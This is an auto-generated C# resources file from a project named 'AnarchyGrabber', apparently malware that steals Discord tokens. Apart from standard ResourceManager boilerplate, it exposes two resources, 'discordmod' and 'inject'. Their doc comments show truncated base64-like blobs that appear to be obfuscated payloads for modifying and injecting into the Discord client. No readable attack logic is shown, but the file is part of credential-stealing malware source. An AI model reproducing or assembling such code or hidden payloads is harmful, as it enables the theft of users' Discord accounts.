//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace AnarchyGrabber {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("AnarchyGrabber.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to bNiA6QJxUv1Mszb43MBNGvKW5/8cOwB4lEExKsHDYB/1HLKxoxGjdtWRvAZtkXiT6mpqAYfGX8a+3KCPuoSmI7yPjvHWThcGYIM653167Xf0/2k+lJEpDzX1vzRZUxmwglwrmIbBoOPRWJUQxNZUhseKYrmSo3Vj033JrZWheNJoeJsiKXR24sMy9ulo+F1UaNkMY2VNkuKb9hLMU672HRrLPiuMtDcJVOxCrMfL/rJMn+y3XSywVBG4ZOvIy1iS+KyX3sSzszzJKXys/QzdpMq/QgC0YUbHAbz99ZsTPhGTYaZgt6N8mE3eyDR/O2JmWafn7FrdvZhRyQrD7JL3ESJLKeHoiCjWKB9TyAbgEe8Mr0vcsheSFt/9F6ceCjL/dKz+JqDdS1XpmMgMmdC0dNGMCcIgpdNCyPQEtZQN36BxABa8o9l4PEjodeg+YN8Fr5OscrA+1/S3gPGLZXMIoD/ikXdP7pTAwj8AFhlF885J7F0bMspCVFV56Ggh4WtX [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string discordmod {
            get {
                return ResourceManager.GetString("discordmod", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to ntVcac1yPeepsF007AHMJCRvQB3dEY879ARKqTcW55r3CScNxNr/UuBdOMeDFpHJVOVS8DdYFk9ofeNvF0D4SGF7hoN15B8nXLziMOolWC9Q7wBbtXq9HCA0SztsmeyXGhivArjm/UMaLQ1uAO5pEJLIAPBcvyjOqggOZkcSm1OeBa11x7myeYCEBhVi6Kd9IOg9j/hsE+pZOpyyGEqBXhBlOc02YRtM8uLTwaBhNlReZn85Ci89qe8pTpGLX45xARJXRVH1BbkfZABcgAEEv+GgQ1mCEW1RmjFGC/+nyw2v+4WbMONlSS8ZuhFN7gPOIaMhiVaWEn8KCwEP3iVE2eUUlrL3furBXoGAjx9mbWfns/etxtguNrfud7/S32mVEmOxp8TJ9uAUQDb7ilvF0wnBVktbe7JfIPVRJM+HBR+wqbZtLFTXeaecxmcNUocmvj6EEVL9hIptJfShWVcfV9pkj76lQmlYdcGGHsYJcQvndA2t5JvnaxBPYnnOQ5RJ [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string inject {
            get {
                return ResourceManager.GetString("inject", resourceCulture);
            }
        }
    }
}
